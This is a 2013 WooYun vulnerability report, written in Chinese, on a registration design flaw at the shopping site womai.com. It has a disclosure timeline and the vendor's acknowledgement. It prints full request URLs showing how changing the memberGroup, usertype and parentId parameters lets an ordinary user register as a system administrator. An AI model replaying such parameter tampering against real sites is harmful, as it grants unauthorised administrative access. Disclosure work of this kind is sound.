漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-022676
漏洞标题:中粮我买网设计缺陷
相关厂商:中粮我买网
漏洞作者: 刺刺
提交时间:2013-04-29 01:57
修复时间:2013-06-13 01:58
公开时间:2013-06-13 01:58
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-04-29: 细节已通知厂商并且等待厂商处理中
2013-04-29: 厂商已经确认,细节仅向厂商公开
2013-05-09: 细节向核心白帽子及相关领域专家公开
2013-05-19: 细节向普通白帽子公开
2013-05-29: 细节向实习白帽子公开
2013-06-13: 细节向公众公开
简要描述:
中粮我买网某功能存在设计缺陷,可提权,提很高的权限。
详细说明:
我买网用户注册功能存在设计缺陷,普通用户可以注册成系统管理员。
1. 使用Fiddle抓包,用户注册过程
最终得到以下链接:
http://www.womai.com/Cart/Register.do?
parendId=&
Email=sex%2540126.com
&loginId=foxxx&password=sexsex11&password2=sexsex11
&invitationCode=&
know_womai=%25E6%259C%258B%25E5%258F%258B%25E4%25BB%258B%25E7%25BB%258D&know_womai=%25E6%2590%259C%25E7%25B4%25A2%25E5%25BC%2595%25E6%2593%258E
&know_womai=%25E4%25BF%2583%25E9%2594%2580%25E5%258D%2595&know_womai=%25E8%25AE%25BA%25E5%259D%259B
&know_womai=%25E6%2596%25B0%25E9%2597%25BB&know_womai=%25E5%2585%25B6%25E4%25BB%2596
&validateCode=au6q
&=on&providerName=userRegistExtentionAttribute
&memberGroup=100
&parentId=
&mid=0
&usertype=&
returnUrl=&callback=jsonp1367119154807&_=1367119289017
解释以下上面的部分内容:
parendId= 商家代码
Email=sex%2540126.com
&loginId=foxxx&password=assssssa&password2=assssssa 注册的邮箱、用户名和密码
validateCode 验证码
memberGroup=100 用户组#1是管理员组
parentId= 商家代码 #0是系统
usertype= 用户类型 #1是管理员
根据以上匹配,重新提交请求:
http://www.womai.com/Cart/Register.do?parendId=0&Email=sex%2540126.com&loginId=foxxx&password=sexsex11&password2=sexsex11&invitationCode=&know_womai=%25E6%259C%258B%25E5%258F%258B%25E4%25BB%258B%25E7%25BB%258D&know_womai=%25E6%2590%259C%25E7%25B4%25A2%25E5%25BC%2595%25E6%2593%258E&know_womai=%25E4%25BF%2583%25E9%2594%2580%25E5%258D%2595&know_womai=%25E8%25AE%25BA%25E5%259D%259B&know_womai=%25E6%2596%25B0%25E9%2597%25BB&know_womai=%25E5%2585%25B6%25E4%25BB%2596&validateCode=au6q&=on&providerName=userRegistExtentionAttribute&memberGroup=1&parentId=0&mid=0&usertype=1&returnUrl=&callback=jsonp1367119154807&_=1367119289017
你就可以注册成功了。
漏洞证明:
修复方案:
这个问题可能会影响广州信景的很多客户,建议联系厂商。
建议厂商对早期版本的客户及时修补,因为早期的版本还有其他的安全问题,
比这个简单且威力大。
版权声明:转载请注明来源 刺刺@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:13
确认时间:2013-04-29 20:07
厂商回复:
感谢洞主!!我们尽快安排修复。
最新状态:
暂无